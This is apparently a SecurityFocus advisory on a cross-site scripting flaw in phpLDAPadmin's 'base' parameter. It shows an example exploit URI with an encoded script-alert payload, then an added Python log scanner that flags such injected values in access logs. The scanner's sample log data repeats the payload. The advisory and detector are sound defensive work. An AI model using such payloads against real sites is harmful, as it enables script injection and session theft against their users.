phpLDAPadmin 'base' Parameter Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following example URI is available:

http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search
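For defenders, a log check for requests of the shape shown above. This is an added example, not code from SecurityFocus or the phpLDAPadmin project; the function names are hypothetical and the access-log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# 'base' is meant to hold an LDAP search base (a DN). RFC 4514 requires '<' and
# '>' to be escaped in a DN and real DNs rarely contain them, so any angle
# bracket in the decoded value is a low-noise signal of injected markup.
ANGLE_RE = re.compile(r"[<>]")
MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap double/triple encoding

# Constructed sample log lines (documentation IP range, example paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&base=dc%3Dexample%2Cdc%3Dcom&scope=sub HTTP/1.1" 200 4096',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /phpldapadmin/htdocs/cmd.php?cmd=query_engine&base=%253Cscript%253E HTTP/1.1" 200 5001',
]

def fully_decode(value):
    """Percent-decode repeatedly so %253C (double-encoded '<') is also seen."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_base_values(log_line):
    """Return decoded 'base' values of a cmd.php request that contain < or >."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.endswith("/cmd.php"):
        return []
    # parse_qs does the first round of decoding; fully_decode handles the rest.
    values = parse_qs(target.query, keep_blank_values=True).get("base", [])
    return [v for v in map(fully_decode, values) if ANGLE_RE.search(v)]

def scan(lines):
    """Return (line_number, flagged_values) for every log line with a hit."""
    hits = [(n, suspicious_base_values(line)) for n, line in enumerate(lines, 1)]
    return [(n, values) for n, values in hits if values]

if __name__ == "__main__":
    for line_number, values in scan(SAMPLE_LOG):
        print(f"line {line_number}: suspicious base value(s): {values}")
```
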


 

Copyright 2010, SecurityFocus